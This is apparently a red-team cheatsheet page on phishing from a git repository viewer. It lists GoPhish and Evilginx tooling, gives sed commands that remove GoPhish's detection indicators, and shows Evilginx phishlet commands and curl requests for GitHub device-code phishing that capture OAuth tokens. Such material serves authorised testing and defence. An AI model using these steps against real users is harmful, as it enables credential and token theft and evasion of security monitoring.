daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

phishing.md (3794B)


      1 ---
      2 title: "Phishing"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/access/phishing.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/phishing.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Phishing
     12 
     13 > Phishing is a cybersecurity attack where malicious actors impersonate legitimate organizations (like banks, social media platforms, or email providers) to trick people into revealing sensitive information such as passwords, credit card numbers, or personal data.
     14 
     15 ## Opsec Fails
     16 
     17 * **Reusing IPs/Domains**: Using the same IP address or domain across multiple campaigns or malware families.
     18 * **No Domain Privacy**: WHOIS records exposing registrant info (name, email, phone).
     19 * **Same Registrant Email**: Reusing the same email address across domains.
     20 * **Unrotated SSL Certificates**: Self-signed or identical certificates reused across phishing sites.
     21 
     22 ## GoPhish
     23 
     24 * [gophish/gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit
     25 * [kgretzky/gophish/](https://github.com/kgretzky/gophish/) - Gophish integration with Evilginx 3.3
     26 * [puzzlepeaches/sneaky_gophish](https://github.com/puzzlepeaches/sneaky_gophish) - Hiding GoPhish from the boys in blue
     27 
     28 ```ps1
     29 git clone https://github.com/gophish/gophish.git
     30 go build
     31 ```
     32 
     33 ### IOC
     34 
     35 * `X-Gophish-Contact` and `X-Gophish-Signature`
     36 
     37     ```ps1
     38     find . -type f -exec sed -i.bak 's/X-Gophish-Contact/X-Contact/g' {} +
     39     sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
     40     sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
     41     sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
     42     sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
     43 
     44     find . -type f -exec sed -i.bak 's/X-Gophish-Signature/X-Signature/g' {} +
     45     sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
     46     ```
     47 
     48 * Default server name
     49 
     50     ```ps1
     51     sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
     52     ```
     53 
     54 * Default `rid` parameter
     55 
     56     ```ps1
     57     sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "keyname"/g' models/campaign.go
     58     ```
     59 
     60 ## Evilginx
     61 
     62 * [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
     63 * [evilginxpro](https://evilginx.com/) - The phishing framework for red teams
     64 
     65 ```ps1
     66 # List Available Phishlets
     67 phishlets
     68 
     69 # Enable a Phishlet
     70 phishlets enable <phishlet_name>
     71 
     72 # Disable a Phishlet
     73 phishlets disable <phishlet_name>
     74 ```
     75 
     76 ## Device Code Phishing
     77 
     78 * Github
     79 
     80     ```ps1
     81     curl -X POST https://github.com/login/device/code \
     82     -H "Accept: application/json" \
     83     -d "client_id=01ab8ac9400c4e429b23&scope=user+repo+workflow"
     84 
     85     curl -X POST https://github.com/login/oauth/access_token \
     86     -H "Accept: application/json" \
     87     -d "client_id=01ab8ac9400c4e429b23&device_code=be9<code_from_earlier>&&grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code" -k | jq
     88     ```
     89 
     90 ## References
     91 
     92 * [A Smooth Sea Never Made a Skilled Phisherman - Kuba Gretzky - 8 july 2024](https://youtu.be/Nh99d3YnpI4)
     93 * [Introducing: GitHub Device Code Phishing - John Stawinski, Mason Davis, Matt Jackoski - June 12, 2025](https://www.praetorian.com/blog/introducing-github-device-code-phishing/)
     94 * [Never had a bad day phishing. How to set up GoPhish to evade security controls - Nicholas Anastasi - Jun 30, 2021](https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls)
     95 * [Unraveling and Countering Adversary-in-the-Middle Phishing Attacks - Pawel Partyka - 8 july 2024](https://youtu.be/-W-LxcbUxI4)